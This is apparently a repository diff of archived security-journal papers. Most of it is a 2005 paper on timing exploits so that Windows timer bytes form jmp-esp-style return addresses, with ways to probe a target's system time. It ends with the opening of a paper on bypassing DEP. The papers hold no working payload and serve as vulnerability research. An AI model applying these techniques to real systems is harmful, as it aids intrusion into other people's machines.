This is the type of information that is required in order to determine when a
|
||||
portion of a temporal address can be used as a return address for an exploit.
|
||||
The approach taken to accomplish this is to make use of the equations provided
|
||||
in the previous chapter for calculating the number of seconds it takes for
|
||||
each byte to change based on the update period for a given temporal address.
|
||||
By using the tosec function for each byte index, a table can be created as
|
||||
illustrated in figure 4.1 for a 100nanosecond 8 byte timer.
|
||||
|
||||
|
||||
Byte Index Seconds (ext)
|
||||
------------------------
|
||||
0 0 (zero)
|
||||
1 0 (zero)
|
||||
2 0 (zero)
|
||||
3 1 (1 sec)
|
||||
4 429 (7 mins 9 secs)
|
||||
5 109951 (1 day 6 hours 32 mins 31 secs)
|
||||
6 28147497 (325 days 18 hours 44 mins 57 secs)
|
||||
7 7205759403 (228 years 179 days 23 hours 50 mins 3 secs)
|
||||
|
||||
Figure 4.1: 8 byte 100ns per-byte durations in seconds
|
||||
|
||||
|
||||
This shows that any opcodes starting at byte index 4 will have a 7 minute and
|
||||
9 second window of time. The only thing left to do is figure out when to
|
||||
strike.
|
||||
|
||||
|
||||
5) Picking the Time to Strike
|
||||
|
||||
The time to attack is entirely dependent on both the update period of the
|
||||
temporal address and its scale. In most cases, temporal addresses that have a
|
||||
scale that is relative to an arbitrary date (such as 1970 or 1601) are the
|
||||
most useful because they can be predicted or determined with some degree of
|
||||
certainty. Regardless, a generalized approach can be used to determine
|
||||
projected time intervals where useful opcodes will occur.
|
||||
|
||||
To do this, it is first necessary to identify the set of instructions that
|
||||
could be useful for a given exploit, such as a jmp esp. Once identified, the
|
||||
next step is to break the instructions down into their raw opcodes, such as
|
||||
0xff 0xe4 for jmp esp. After all the raw opcodes have been collected, it is
|
||||
then necessary to begin calculating the projected time intervals that the
|
||||
bytes will occur at. The method used to accomplish this is rather simple.
|
||||
|
||||
First, a starting byte index must be determined in terms of the lowest
|
||||
acceptable window of time that an exploit can use. In the case of a 100
|
||||
nanosecond timer, the best byte index to start at would be byte index 4
|
||||
considering all previous indexes have a duration of less than or equal to one
|
||||
second. The bytes that occur at index 4 have a 7 minute and 9 second
|
||||
duration, thus making them feasible for use. With the starting byte index
|
||||
determined, the next step is to create permutations of all subsequent opcode
|
||||
byte combinations. In simpler terms, this would mean producing all of the
|
||||
possible byte value combinations that contain the raw opcodes of a given
|
||||
instruction at a byte index equal to or greater than the starting byte index.
|
||||
To help visualize this, figure 5.1 provides a small sample of jmp esp byte
|
||||
combinations in relation to a 100 nanosecond timer.
|
||||
|
||||
|
||||
Byte combinations
|
||||
-----------------------
|
||||
00 00 00 00 ff e4 00 00
|
||||
00 00 00 00 ff e4 01 00
|
||||
00 00 00 00 ff e4 02 00
|
||||
...
|
||||
00 00 00 00 ff e4 47 04
|
||||
00 00 00 00 ff e4 47 05
|
||||
00 00 00 00 ff e4 47 06
|
||||
...
|
||||
00 00 00 00 00 ff e4 00
|
||||
00 00 00 00 00 ff e4 01
|
||||
00 00 00 00 00 ff e4 02
|
||||
|
||||
Figure 5.1: 8 byte 100ns jmp esp byte combinations
|
||||
|
||||
|
||||
Once all of the permutations have been generated, the next step is to convert
|
||||
them to meaingful absolute time representations. This is accomplished by
|
||||
converting all of the permutations, which represent past, future, or present
|
||||
states of the temporal address, to seconds. For instance, one of the
|
||||
permutations for a jmp esp instruction found within the 64-bit 100nanosecond
|
||||
timer is 0x019de4ff00000000 (116500949249294300). Converting this to seconds
|
||||
is accomplished by doing:
|
||||
|
||||
|
||||
11650094924 = trunc(116500949249294300 / 10^7)
|
||||
|
||||
|
||||
This tells us the number of seconds that will have passed when the stars align
|
||||
to form this byte combination, but it does not convey the scale in which the
|
||||
seconds are measured, such as whether they are based from an absolute date
|
||||
(such as 1970 or 1601) or are simply acting as a timer. In this case, if the
|
||||
scale were defined as being the number of seconds since 1601, the total number
|
||||
of seconds could be adjusted to indicate the number of seconds that have
|
||||
occurred since 1970 by subtracting the constant number of seconds between 1970
|
||||
and 1601:
|
||||
|
||||
|
||||
5621324 = 11650094924 - 11644473600
|
||||
|
||||
|
||||
This indicates that a total of 5621324 seconds will have passed since 1970
|
||||
when 0xff will be found at byte index 4 and 0xe4 will be found at byte index
|
||||
5. The window of opportunity will be 7 minutes and 9 seconds after which
|
||||
point the 0xff will become a 0x00, the 0xe4 will become 0xe5, and the
|
||||
instruction will no longer be usable. If 5621324 is converted to a printable
|
||||
date format based on the number of seconds since 1970, one can find that the
|
||||
date that this particular permutation will occur at is Fri Mar 06 19:28:44 CST
|
||||
1970.
|
||||
|
||||
While it's now been shown that is perfectly possible to predict specific times
|
||||
in the past, present, and future that a given instruction or instructions can
|
||||
be found within a temporal address, such an ability is not useful without
|
||||
being able to predict or determine the state of the temporal address on a
|
||||
target computer at a specific moment in time. For instance, while an
|
||||
exploitation chronomancer knows that a jmp esp can be found on March 6th, 1970
|
||||
at about 7:30 PM, it must also be known what the target machine has their
|
||||
system time set to down to a granularity of mere seconds, or at least minutes.
|
||||
While guessing is always an option, it is almost certainly going to be less
|
||||
fruitful than making use of existing tools and services that are more than
|
||||
willing to provide a would-be attacker with information about the current
|
||||
system time on a target machine. Some of the approaches that can be taken to
|
||||
gather this information will be discussed in the next section.
|
||||
|
||||
|
||||
5.1) Determining System Time
|
||||
|
||||
There are a variety of techniques that can potentially be used to determine
|
||||
the system time of a target machine with varying degrees of accuracy. The
|
||||
techniques listed in this section are by no means all-encompassing but do
|
||||
serve as a good base. Each technique will be elaborated on in the following
|
||||
sub-sections.
|
||||
|
||||
|
||||
5.1.1) DCERPC SrvSvc NetrRemoteTOD
|
||||
|
||||
One approach that can be taken to obtain very granular information about the
|
||||
current system time of a target machine is to use the SrvSvc's NetrRemoteTOD
|
||||
request. To transmit this request to a target machine a NULL session (or
|
||||
authenticated session) must be established using the standard Session Setup
|
||||
AndX SMB request. After that, a Tree Connect AndX to the IPC share should be
|
||||
issued. From there, an NT Create AndX request can be issued on the named
|
||||
pipe. Once the request is handled successfully the file descriptor returned
|
||||
can be used for the DCERPC bind request to the SrvSvc's UUID. Finally, once
|
||||
the bind request has completed successfully, a NetrRemoteTOD request can be
|
||||
transacted over the named pipe using a TransactNmPipe request. The response
|
||||
to this request should contain very granular information, such as day, hour,
|
||||
minute, second, timezone, as well as other fields that are needed to determine
|
||||
the target machine's system time. Figure shows a sample response.
|
||||
|
||||
This vector is very useful because it provides easy access to the complete
|
||||
state of a target machine's system time which in turn can be used to calculate
|
||||
the windows of time that a temporal address can be used during exploitation.
|
||||
The negatives to this approach is that it requires access to the SMB ports
|
||||
(either 139 or 445) which will most likely be inaccessible to an attacker.
|
||||
|
||||
|
||||
5.1.2) ICMP Timestamps
|
||||
|
||||
The ICMP TIMESTAMP request (13) can be used to obtain a machine's measurement
|
||||
of the number of milliseconds that have occurred since midnight UT. If an
|
||||
attacker can infer or assume that a target machine's system time is set to a
|
||||
specific date and timezone, it may be possible to calculate the absolute
|
||||
system time down to a millisecond resolution. This would satisfy the timing
|
||||
requirements and make it possible to make use of temporal addresses that have
|
||||
a scale that is measured from an absolute time. According to the RFC, though,
|
||||
if a system is unable to determine the number of milliseconds since UT then it
|
||||
can use another value capable of representing time (though it must set a
|
||||
high-order bit to indicate the non-standard value).
|
||||
|
||||
|
||||
5.1.3) IP Timestamp Option
|
||||
|
||||
Like the ICMP TIMESTAMP request, IP also has a timestamp option (type 68) that
|
||||
measures the number of milliseconds since midnight UT. This could also be used
|
||||
to determine down to a millisecond resolution what the remote system's clock
|
||||
is set to. Since the measurement is the same, the limitations are the same as
|
||||
ICMP's TIMESTAMP request.
|
||||
|
||||
|
||||
5.1.4) HTTP Server Date Header
|
||||
|
||||
In scenarios where a target machine is running an HTTP server, it may be
|
||||
possible to extract the system time by simply sending an HTTP request and
|
||||
checking to see if the response contains a date header or not. Figure shows
|
||||
an example HTTP response that contains a date header.
|
||||
|
||||
|
||||
5.1.5) IRC CTCP TIME
|
||||
|
||||
Perhaps one of the more lame approaches to obtaining a target machine's time
|
||||
is by issuing a CTCP TIME request over IRC. This request is designed to
|
||||
instruct the responder to reply with a readable date string that is relative
|
||||
to the responder's system time. Unless spoofed, the response should be
|
||||
equivalent to the system time on the remote machine.
|
||||
|
||||
|
||||
6) Determining the Return Address
|
||||
|
||||
Once all the preliminary work of calculating all of the viable opcode windows
|
||||
has been completed and a target machine's system time has been determined, the
|
||||
final step is to select the next available window for a compatible opcode
|
||||
group. For instance, if the next window for a jmp esp equivalent instruction
|
||||
is Sun Sep 25 22:37:28 CDT 2005, then the byte index to the start of the jmp
|
||||
esp equivalent must be determined based on the permutation that was generated.
|
||||
In this case, the permutation that would have been generated (assuming a
|
||||
100nanosecond period since 1601) is 0x01c5c25400000000. This means that jmp
|
||||
esp equivalent is actually a push esp, ret which starts at byte index four.
|
||||
If the start of the temporal address was at 0x7ffe0014, then the return
|
||||
address that should be used in order to get the push esp, ret to execute would
|
||||
be 0x7ffe0018. This basic approach is common to all temporal addresses of
|
||||
varying capacity, period, and scale.
|
||||
|
||||
|
||||
7) Case Study: Windows NT SharedUserData
|
||||
|
||||
With all the generic background information out of the way, a real world
|
||||
practical use of this technique can be illustrated through an analysis of a
|
||||
region of memory that happens to be found in every process on Windows NT+.
|
||||
This region of memory is referred to as SharedUserData and has a backward
|
||||
compatible format for all versions of NT, though new fields have been appended
|
||||
over time. At present, the data structure that represents SharedUserData is
|
||||
KUSERSHAREDDATA which is defined as follows on Windows XP SP2:
|
||||
|
||||
|
||||
0:000> dt _KUSER_SHARED_DATA
|
||||
+0x000 TickCountLow : Uint4B
|
||||
+0x004 TickCountMultiplier : Uint4B
|
||||
+0x008 InterruptTime : _KSYSTEM_TIME
|
||||
+0x014 SystemTime : _KSYSTEM_TIME
|
||||
+0x020 TimeZoneBias : _KSYSTEM_TIME
|
||||
+0x02c ImageNumberLow : Uint2B
|
||||
+0x02e ImageNumberHigh : Uint2B
|
||||
+0x030 NtSystemRoot : [260] Uint2B
|
||||
+0x238 MaxStackTraceDepth : Uint4B
|
||||
+0x23c CryptoExponent : Uint4B
|
||||
+0x240 TimeZoneId : Uint4B
|
||||
+0x244 Reserved2 : [8] Uint4B
|
||||
+0x264 NtProductType : _NT_PRODUCT_TYPE
|
||||
+0x268 ProductTypeIsValid : UChar
|
||||
+0x26c NtMajorVersion : Uint4B
|
||||
+0x270 NtMinorVersion : Uint4B
|
||||
+0x274 ProcessorFeatures : [64] UChar
|
||||
+0x2b4 Reserved1 : Uint4B
|
||||
+0x2b8 Reserved3 : Uint4B
|
||||
+0x2bc TimeSlip : Uint4B
|
||||
+0x2c0 AlternativeArchitecture : _ALTERNATIVE_ARCHITECTURE_TYPE
|
||||
+0x2c8 SystemExpirationDate : _LARGE_INTEGER
|
||||
+0x2d0 SuiteMask : Uint4B
|
||||
+0x2d4 KdDebuggerEnabled : UChar
|
||||
+0x2d5 NXSupportPolicy : UChar
|
||||
+0x2d8 ActiveConsoleId : Uint4B
|
||||
+0x2dc DismountCount : Uint4B
|
||||
+0x2e0 ComPlusPackage : Uint4B
|
||||
+0x2e4 LastSystemRITEventTickCount : Uint4B
|
||||
+0x2e8 NumberOfPhysicalPages : Uint4B
|
||||
+0x2ec SafeBootMode : UChar
|
||||
+0x2f0 TraceLogging : Uint4B
|
||||
+0x2f8 TestRetInstruction : Uint8B
|
||||
+0x300 SystemCall : Uint4B
|
||||
+0x304 SystemCallReturn : Uint4B
|
||||
+0x308 SystemCallPad : [3] Uint8B
|
||||
+0x320 TickCount : _KSYSTEM_TIME
|
||||
+0x320 TickCountQuad : Uint8B
|
||||
+0x330 Cookie : Uint4B
|
||||
|
||||
|
||||
One of the purposes of SharedUserData is to provide processes with a global
|
||||
and consistent method of obtaining certain information that may be requested
|
||||
frequently, thus making it more efficient than having to incur the performance
|
||||
hit of a system call. Furthermore, as of Windows XP, SharedUserData acts as
|
||||
an indirect system call re-director such that the most optimized system call
|
||||
instructions can be used based on the current hardware's support, such as by
|
||||
using sysenter over the standard int 0x2e.
|
||||
|
||||
As can be seen right off the bat, SharedUserData contains a few fields that
|
||||
pertain to the timing of the current system. Furthermore, if one looks
|
||||
closely, it can be seen that these timer fields are actually updated
|
||||
constantly as would be expected for any timer variable:
|
||||
|
||||
|
||||
0:000> dd 0x7ffe0000 L8
|
||||
7ffe0000 055d7525 0fa00000 93fd5902 00000cca
|
||||
7ffe0010 00000cca a78f0b48 01c59a46 01c59a46
|
||||
0:000> dd 0x7ffe0000 L8
|
||||
7ffe0000 055d7558 0fa00000 9477d5d2 00000cca
|
||||
7ffe0010 00000cca a808a336 01c59a46 01c59a46
|
||||
0:000> dd 0x7ffe0000 L8
|
||||
7ffe0000 055d7587 0fa00000 94e80a7e 00000cca
|
||||
7ffe0010 00000cca a878b1bc 01c59a46 01c59a46
|
||||
|
||||
|
||||
The three timing-related fields of most interest are TickCountLow,
|
||||
InterruptTime, and SystemTime. These three fields will be explained
|
||||
individually later in this chapter. Prior to that, though, it is important to
|
||||
understand some of the properties of SharedUserData and why it is that it's
|
||||
quite useful when it comes to temporal addresses.
|
||||
|
||||
|
||||
7.1) The Properties of SharedUserData
|
||||
|
||||
There are a number of important properties of SharedUserData, some of
|
||||
which make it useful in terms of temporal addresses and others that make it
|
||||
somewhat infeasible depending on the exploit or hardware support. As far as
|
||||
the properties that make it useful go, SharedUserData is located at a static
|
||||
address, 0x7ffe0000, in every version of Windows NT+. Furthermore,
|
||||
SharedUserData is mapped into every process. The reasons for this are that
|
||||
NTDLL, and most likely other 3rd party applications, have been compiled and
|
||||
built with the assumption that SharedUserData is located at a fixed address.
|
||||
This is something many people are abusing these days when it comes to passing
|
||||
code from kernel-mode to user-mode. On top of that, SharedUserData is required
|
||||
to have a backward compatible data structure which means that the offsets of
|
||||
all existing attributes will never shift, although new attributes may be, and
|
||||
have been, appended to the end of the data structure. Lastly, there are a few
|
||||
products for Windows that implement some form of ASLR. Unfortunately for these
|
||||
products, SharedUserData cannot be feasibly randomized, or at least the author
|
||||
is not aware of any approaches that wouldn't have severe performance impacts.
|
||||
|
||||
On the negative side of the house, and perhaps one of the most limiting
|
||||
factors when it comes to making use of SharedUserData, is that it has a null
|
||||
byte located at byte index one. Depending on the vulnerability, it may or may
|
||||
not be possible to use an attribute within SharedUserData as a return address
|
||||
due to NULL byte restrictions. As of XP SP2 and 2003 Server SP1,
|
||||
SharedUserData is no longer marked as executable and will result in a DEP
|
||||
violation (if enabled) assuming the hardware supports PAE. While this is not
|
||||
very common yet, it is sure to become the norm over the course of time.
|
||||
|
||||
|
||||
7.2) Locating Temporal Addresses
|
||||
|
||||
As seen previously in this document, using the telescope program on any
|
||||
Windows application will result in the same two (or three) timers being
|
||||
displayed:
|
||||
|
||||
|
||||
C:\>telescope 2620
|
||||
[*] Attaching to process 2620 (5 polling cycles)...
|
||||
[*] Polling address space........
|
||||
|
||||
Temporal address locations:
|
||||
0x7FFE0000 [Size=4, Scale=Counter, Period=600 msec]
|
||||
0x7FFE0014 [Size=8, Scale=Epoch (1601), Period=100 nsec]
|
||||
|
||||
|
||||
Referring to the structure definition described at the beginning of this
|
||||
chapter, it is possible for one to determine which attribute each of these
|
||||
addresses is referring to. Each of these three attributes will be discussed
|
||||
in detail in the following sub-sections.
|
||||
|
||||
|
||||
7.2.1) TickCountLow
|
||||
|
||||
The TickCountLow attribute is used, in combination with the
|
||||
TickCountMultiplier, to convey the number of milliseconds that have occurred
|
||||
since system boot. To calculate the number of milliseconds since system boot,
|
||||
the following equation is used:
|
||||
|
||||
|
||||
T = shr(TickCountLow * TickCountMultiplier, 24)
|
||||
|
||||
|
||||
This attribute is representative of a temporal address that has a counter
|
||||
scale. It starts an unknown time and increments at constant intervals. The
|
||||
biggest problem with this attribute are the intervals that it increases at.
|
||||
It's possible that two machines in the same room with different hardware will
|
||||
have different update periods for the TickCountLow attribute. This makes it
|
||||
less feasible to use as a temporal address because the update period cannot be
|
||||
readily predicted. On the other hand, it may be possible to determine the
|
||||
current uptime of the machine through TCP timestamps or some alternative
|
||||
mechanism, but without the ability to determine the update period, the
|
||||
TickCountLow attribute seems unusable.
|
||||
|
||||
This attribute is located at 0x7ffe0000 on all versions of Windows NT+.
|
||||
|
||||
|
||||
7.2.2) InterruptTime
|
||||
|
||||
This attribute is used to store a 100 nanosecond timer starting at system boot
|
||||
that presumably counts the amount of time spent processing interrupts. The
|
||||
attribute itself is stored as a KSYSTEMTIME structure which is defined as:
|
||||
|
||||
|
||||
0:000> dt _KSYSTEM_TIME
|
||||
+0x000 LowPart : Uint4B
|
||||
+0x004 High1Time : Int4B
|
||||
+0x008 High2Time : Int4B
|
||||
|
||||
|
||||
Depending on the hardware a machine is running, the InterruptTime's period may
|
||||
be exactly equal to 100 nanoseconds. However, testing has seemed to confirm
|
||||
that this is not always the case. Given this, both the update period and the
|
||||
scale of the InterruptTime attribute should be seen as limiting factors. This
|
||||
fact makes it less useful because it has the same limitations as the
|
||||
TickCountLow attribute. Specifically, without knowing when the system booted
|
||||
and when the counter started, or how much time has been spent processing
|
||||
interrupts, it is not possible to reliably predict when certain bytes will be
|
||||
at certain offsets. Furthermore, the machine would need to have been booted
|
||||
for a significant amount of time in order for some of the useful instructions
|
||||
to be feasibly found within the bytes that compose the timer.
|
||||
|
||||
This attribute is located at 0x7ffe0008 on all versions of Windows NT+.
|
||||
|
||||
|
||||
7.2.3) SystemTime
|
||||
|
||||
The SystemTime attribute is by far the most useful attribute when it comes to
|
||||
its temporal address qualities. The attribute itself is a 100 nanosecond
|
||||
timer that is measured from Jan. 1, 1601 which is stored as a KSYSTEMTIME
|
||||
structure like the InterruptTime attribute. See the InterruptTime sub-section
|
||||
for a structure definition. This means that it has an update period of 100
|
||||
nanoseconds and has a scale that measures from Jan. 1, 1601. The scale is also
|
||||
measured relative to the timezone that the machine is using (with the
|
||||
exclusion of daylight savings time). If an attacker is able to obtain
|
||||
information about the system time on a target machine, it may be possible to
|
||||
make use of the SystemTime attribute as a valid temporal address for
|
||||
exploitation purposes.
|
||||
|
||||
This attribute is located at 0x7ffe0014 on all versions of Windows NT+.
|
||||
|
||||
|
||||
7.3) Calculating Viable Opcode Windows
|
||||
|
||||
After analyzing SharedUserData for temporal addresses it should become clear
|
||||
that the SystemTime attribute is by far the most useful and potentially
|
||||
feasible attribute due to its scale and update period. In order to
|
||||
successfully leverage it in conjunction with an exploit, though, the viable
|
||||
opcode windows must be calculated so that a time to strike can be selected.
|
||||
This can be done prior to determining what the actual date is on a target
|
||||
machine but requires that the storage capacity (size of the temporal address
|
||||
in bytes), the update period, and the scale be known. In this case, the size
|
||||
of the SystemTime attribute is 12 bytes, though in reality the 3rd attribute,
|
||||
High2Time, is exactly the same as the second, High1Time, so all that really
|
||||
matters are the the first 8 bytes. Doing the math to calculate per-byte
|
||||
durations gives the results shown in figure . This indicates that it is only
|
||||
worth focusing on opcode permutations that start at byte index four due to the
|
||||
fact that all previous byte indexes have a duration of less than or equal to
|
||||
one second. By applying the scale as being measured since Jan 1, 1601, all of
|
||||
the possible permutations for the past, present, and future can be calculated
|
||||
as described in chapter . The results of these calculations for the
|
||||
SystemTime attribute are described in the following paragraphs.
|
||||
|
||||
In order to calculate the viable opcode windows it is necessary to have
|
||||
identified the viable set of opcodes. In this case study a total of 320
|
||||
viable opcodes were used (recall that opcode in this case can mean one or more
|
||||
instruction). These viable opcodes were taken from the Metasploit Opcode
|
||||
Database. After performing the necessary calculations and generating all of
|
||||
the permutations, a total of 3615 viable opcode windows were found between
|
||||
Jan. 1, 1970 and Dec. 23, 2037. Each viable opcode was broken down into
|
||||
groupings of similar or equivalent opcodes such that it could be made easier
|
||||
to visualize.
|
||||
|
||||
Looking closely at these figures it can bee seen that there were two large
|
||||
spikes around 2002 and 2003 for the [esp + 8] => eip opcode group which
|
||||
includes pop/pop/ret instructions common to SEH overwrites. Looking more
|
||||
closely at these two years shows that there were two significant periods of
|
||||
time during 2002 and 2003 where the stars aligned and certain exploits could
|
||||
have used the SystemTime attribute as a temporal return address. Figure shows
|
||||
the spikes in more detail. It's a shame that this technique was not published
|
||||
about during those time frames! Never again in the lifetime of anyone who
|
||||
reads this paper will there be such an occurrence.
|
||||
|
||||
Perhaps of more interest than past occurrences of certain opcode groups is
|
||||
what will come in the future. The table in figure 7.1 shows the upcoming
|
||||
viable opcode windows for 2005.
|
||||
|
||||
|
||||
Date Opcode Group
|
||||
------------------------------------------
|
||||
Sun Sep 25 22:08:50 CDT 2005 eax => eip
|
||||
Sun Sep 25 22:15:59 CDT 2005 ecx => eip
|
||||
Sun Sep 25 22:23:09 CDT 2005 edx => eip
|
||||
Sun Sep 25 22:30:18 CDT 2005 ebx => eip
|
||||
Sun Sep 25 22:37:28 CDT 2005 esp => eip
|
||||
Sun Sep 25 22:44:37 CDT 2005 ebp => eip
|
||||
Sun Sep 25 22:51:47 CDT 2005 esi => eip
|
||||
Sun Sep 25 22:58:56 CDT 2005 edi => eip
|
||||
Tue Sep 27 04:41:21 CDT 2005 eax => eip
|
||||
Tue Sep 27 04:48:30 CDT 2005 ecx => eip
|
||||
Tue Sep 27 04:55:40 CDT 2005 edx => eip
|
||||
Tue Sep 27 05:02:49 CDT 2005 ebx => eip
|
||||
Tue Sep 27 05:09:59 CDT 2005 esp => eip
|
||||
Tue Sep 27 05:17:08 CDT 2005 ebp => eip
|
||||
Tue Sep 27 05:24:18 CDT 2005 esi => eip
|
||||
Tue Sep 27 05:31:27 CDT 2005 edi => eip
|
||||
Tue Sep 27 06:43:02 CDT 2005 [esp + 0x20] => eip
|
||||
Fri Oct 14 14:36:48 CDT 2005 eax => eip
|
||||
Sat Oct 15 21:09:19 CDT 2005 ecx => eip
|
||||
Mon Oct 17 03:41:50 CDT 2005 edx => eip
|
||||
Tue Oct 18 10:14:22 CDT 2005 ebx => eip
|
||||
Wed Oct 19 16:46:53 CDT 2005 esp => eip
|
||||
Thu Oct 20 23:19:24 CDT 2005 ebp => eip
|
||||
Sat Oct 22 05:51:55 CDT 2005 esi => eip
|
||||
Sun Oct 23 12:24:26 CDT 2005 edi => eip
|
||||
Thu Nov 03 23:17:07 CST 2005 eax => eip
|
||||
Sat Nov 05 05:49:38 CST 2005 ecx => eip
|
||||
Sun Nov 06 12:22:09 CST 2005 edx => eip
|
||||
Mon Nov 07 18:54:40 CST 2005 ebx => eip
|
||||
Wed Nov 09 01:27:11 CST 2005 esp => eip
|
||||
Thu Nov 10 07:59:42 CST 2005 ebp => eip
|
||||
Fri Nov 11 14:32:14 CST 2005 esi => eip
|
||||
Sat Nov 12 21:04:45 CST 2005 edi => eip
|
||||
|
||||
Figure 7.1: Opcode windows for Sept 2005 - Jan 2006
|
||||
|
||||
|
||||
8) Case study: Example application
|
||||
|
||||
Aside from Windows' processes having SharedUserData present, it may also be
|
||||
possible, depending on the application in question, to find other temporal
|
||||
addresses at static locations across various operating system versions. Take
|
||||
for instance the following example program that simply calls time every second
|
||||
and stores it in a local variable on the stack named t:
|
||||
|
||||
|
||||
#include <windows.h>
|
||||
#include <time.h>
|
||||
|
||||
void main() {
|
||||
unsigned long t;
|
||||
|
||||
while (1) {
|
||||
t = time(NULL);
|
||||
SleepEx(1000, TRUE);
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
When the telescope program is run against a running instance of this example
|
||||
program, the results produced are:
|
||||
|
||||
|
||||
C:\>telescope 3004
|
||||
[*] Attaching to process 3004 (5 polling cycles)...
|
||||
[*] Polling address space........
|
||||
|
||||
Temporal address locations:
|
||||
0x0012FE24 [Size=4, Scale=Counter, Period=70 msec]
|
||||
0x0012FE88 [Size=4, Scale=Counter, Period=1 sec]
|
||||
0x0012FE9C [Size=4, Scale=Counter, Period=1 sec]
|
||||
0x0012FF7C [Size=4, Scale=Epoch (1970), Period=1 sec]
|
||||
0x7FFE0000 [Size=4, Scale=Counter, Period=600 msec]
|
||||
0x7FFE0014 [Size=8, Scale=Epoch (1601), Period=100 nsec]
|
||||
|
||||
|
||||
Judging from the source code of the example application it would seem clear
|
||||
that the address 0x0012ff7c coincides with the local variable t which is used
|
||||
to store the number of seconds since 1970. Indeed, the t variable also has an
|
||||
update period of one second as indicated by the telescope program. The other
|
||||
finds may be either inaccurate or not useful depending on the particular
|
||||
situation, but due to the fact that they were identified as counters instead
|
||||
of being relative to one of the two epoch times most likely makes them
|
||||
unusable.
|
||||
|
||||
In order to write an exploit that can leverage the temporal address t, it is
|
||||
first necessary to take the steps outlined in this document with regard to
|
||||
calculating the duration of each byte index and then building a list of all
|
||||
the viable opcode permutations. The duration of each byte index for a four
|
||||
byte timer with a one second period are shown in figure 8.1.
|
||||
|
||||
|
||||
Byte Index Seconds (ext)
|
||||
------------------------
|
||||
0 1 (1 sec)
|
||||
1 256 (4 mins 16 secs)
|
||||
2 65536 (18 hours 12 mins 16 secs)
|
||||
3 16777216 (194 days 4 hours 20 mins 16 secs)
|
||||
|
||||
Figure 8.1: 4 byte 1sec per-byte durations in seconds
|
||||
|
||||
|
||||
The starting byte index for this temporal address is byte index one due to the
|
||||
fact that it has the smallest feasible window of time for an exploit to be
|
||||
launched (4 mins 16 secs). After identifying this starting byte index,
|
||||
permutations for all the viable opcodes can be generated.
|
||||
|
||||
Nearly all of the viable opcode windows have a window of 4 minutes. Only a
|
||||
few have a window of 18 hours. To get a better idea for what the future has
|
||||
in store for a timer like this one, table 8.2 shows the upcoming viable opcode
|
||||
windows for 2005.
|
||||
|
||||
|
||||
Date Opcode Group
|
||||
------------------------------------------
|
||||
Fri Sep 02 01:28:00 CDT 2005 [reg] => eip
|
||||
Thu Sep 08 21:18:24 CDT 2005 [reg] => eip
|
||||
Fri Sep 09 15:30:40 CDT 2005 [reg] => eip
|
||||
Sat Sep 10 09:42:56 CDT 2005 [reg] => eip
|
||||
Sun Sep 11 03:55:12 CDT 2005 [reg] => eip
|
||||
Tue Sep 13 10:32:00 CDT 2005 [reg] => eip
|
||||
Wed Sep 14 04:44:16 CDT 2005 [reg] => eip
|
||||
|
||||
Figure 8.2: Opcode windows for Sept 2005 - Jan 2006
|
||||
|
||||
|
||||
9) Conclusion
|
||||
|
||||
Temporal addresses are locations in memory that are tied to a timer of some
|
||||
sort, such as a variable storing the number of seconds since 1970. Like a
|
||||
clock, temporal addresses have an update period, meaning the rate at which its
|
||||
contents are changed. They also have an inherent storage capacity which
|
||||
limits the amount of time they can convey before being rolled back over to the
|
||||
start. Finally, temporal addresses will also always have a scale associated
|
||||
with them that indicates the unit of measure for the contents of a temporal
|
||||
address, such as whether it's simply being used as a counter or whether it's
|
||||
measuring the number of seconds since 1970. These three attributes together
|
||||
can be used to predict when certain byte combinations will occur within a
|
||||
temporal address.
|
||||
|
||||
This type of prediction is useful because it can allow an exploitation
|
||||
chronomancer the ability to wait until the time is right and then strike once
|
||||
predicted byte combinations occur in memory on a target machine. In
|
||||
particular, the byte combinations most useful would be ones that represent
|
||||
useful opcodes, or instructions, that could be used to gain control over
|
||||
execution flow and allow an attacker to exploit a vulnerability. Such an
|
||||
ability can give the added benefit of providing an attacker with universal
|
||||
return addresses in situations where a temporal address is found at a static
|
||||
location in memory across multiple operating system and application revisions.
|
||||
|
||||
An exploitation chronomancer is one who is capable of divining the best time
|
||||
to exploit something based on the alignment of certain bytes that occur
|
||||
naturally in a process' address space. By making use of the techniques
|
||||
described in this document, or perhaps ones that have yet to be described or
|
||||
disclosed, those who have yet to dabble in the field of chronomancy can begin
|
||||
to get their feet wet. Viable opcode windows will come and go, but the
|
||||
usefulness of temporal addresses will remain for eternityor at least as long
|
||||
as computers as they are known today are around.
|
||||
|
||||
The fact of the matter is, though, that while the subject matter discussed in
|
||||
this document may have an inherent value, the likelihood of it being used for
|
||||
actual exploitation is slim to none due to the variance and delay between
|
||||
viable opcode windows for different periods and scales of temporal addresses.
|
||||
Or is it really that unlikely? Vlad902 suggested a scenario where an attacker
|
||||
could compromise an NTP server and configure it to constantly return a time
|
||||
that contains a useful opcode for exploitation purposes. All of the machines
|
||||
that synchronize with the compromised NTP server would then eventually have a
|
||||
predictable system time. While not completely fool proof considering it's not
|
||||
always known how often NTP clients will synchronize (although logs could be
|
||||
used), it's nonetheless an interesting approach. Regardless of feasibility,
|
||||
the slave that is knowledge demands to be free, and so it shall.
|
||||
|
||||
|
||||
Bibliography
|
||||
|
||||
Mesander, Rollo, and Zeuge. The Client-To-Client Protocol (CTCP).
|
||||
http://www.irchelp.org/irchelp/rfc/ctcpspec.html; accessed Aug
|
||||
5, 2005.
|
||||
|
||||
|
||||
Metasploit Project. The Metasploit Opcode Database.
|
||||
http://metasploit.com/users/opcode/msfopcode.cgi; accessed Aug
|
||||
6, 2005.
|
||||
|
||||
|
||||
Postel, J. RFC 792 - Internet Control Message Protocol.
|
||||
http://www.ietf.org/rfc/rfc0792.txt?number=792; accessed Aug
|
||||
5, 2005.
|
400
uninformed/2.3.txt
Normal file
400
uninformed/2.3.txt
Normal file
|
@ -0,0 +1,400 @@
|
|||
Bypassing Windows Hardware-enforced Data Execution Prevention
|
||||
Oct 2, 2005
|
||||
|
||||
skape (mmiller@hick.org)
|
||||
Skywing (Skywing@valhallalegends.com)
|
||||
|
||||
One of the big changes that Microsoft introduced in Windows XP Service Pack 2
|
||||
and Windows 2003 Server Service Pack 1 was support for a new feature called Data
|
||||
Execution Prevention (DEP). This feature was added with the intention of doing
|
||||
exactly what its name implies: preventing the execution of code in
|
||||
non-executable memory regions. This is particulary important when it comes to
|
||||
preventing the exploitation of most software vulnerabilities because most
|
||||
exploits tend to rely on storing arbitrary code in what end up being
|
||||
non-executable memory regions, such as a thread stack or a process heap. There
|
||||
are other documented techniques for bypassing non-executable protections, such
|
||||
as returning into ZwProtectVirtualMemory or doing a chained ret2libc style
|
||||
attack, but these approaches tend to be more complicated and in many cases are
|
||||
